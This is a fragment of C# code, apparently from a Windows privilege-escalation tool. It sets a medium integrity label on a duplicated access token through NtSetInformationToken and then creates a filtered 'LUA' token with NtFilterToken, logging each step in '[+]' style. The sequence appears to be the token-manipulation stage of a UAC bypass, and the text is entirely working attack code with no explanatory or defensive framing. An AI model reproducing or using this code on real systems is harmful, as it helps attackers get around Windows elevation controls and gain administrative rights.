public static bool SetTokenInformation() { var pIdentifierAuthority = new WinAPI.SidIdentifierAuthority(); pIdentifierAuthority.Value = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x10 }; byte nSubAuthorityCount = 1; var pSID = new IntPtr(); if (!WinAPI.AllocateAndInitializeSid(ref pIdentifierAuthority, nSubAuthorityCount, 0x2000, 0, 0, 0, 0, 0, 0, 0, out pSID)) { log.Log(LogType.Error, "AllocateAndInitializeSid: {0}", Marshal.GetLastWin32Error()); return(false); } log.Log(LogType.Normal, "[+] Initialized SID : {0}", pSID.ToInt64()); var sidAndAttributes = new WinAPI.SID_AND_ATTRIBUTES(); sidAndAttributes.Sid = pSID; sidAndAttributes.Attributes = Constants.SE_GROUP_INTEGRITY_32; var tokenMandatoryLabel = new WinAPI.TOKEN_MANDATORY_LABEL(); tokenMandatoryLabel.Label = sidAndAttributes; var tokenMandatoryLableSize = Marshal.SizeOf(tokenMandatoryLabel); if (0 != WinAPI.NtSetInformationToken(phNewToken, 25, ref tokenMandatoryLabel, tokenMandatoryLableSize)) { log.Log(LogType.Error, "NtSetInformationToken: {0}", Marshal.GetLastWin32Error()); return(false); } log.Log(LogType.Debug, "Set Token Information : {0}", phNewToken.ToInt64()); var securityAttributes = new WinAPI.SECURITY_ATTRIBUTES(); if (0 != WinAPI.NtFilterToken(phNewToken, 4, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref luaToken)) { log.Log(LogType.Error, "NtFilterToken: {0}", Marshal.GetLastWin32Error()); return(false); } log.Log(LogType.Debug, "Set LUA Token Information : {0}", luaToken.ToInt64()); return(true); }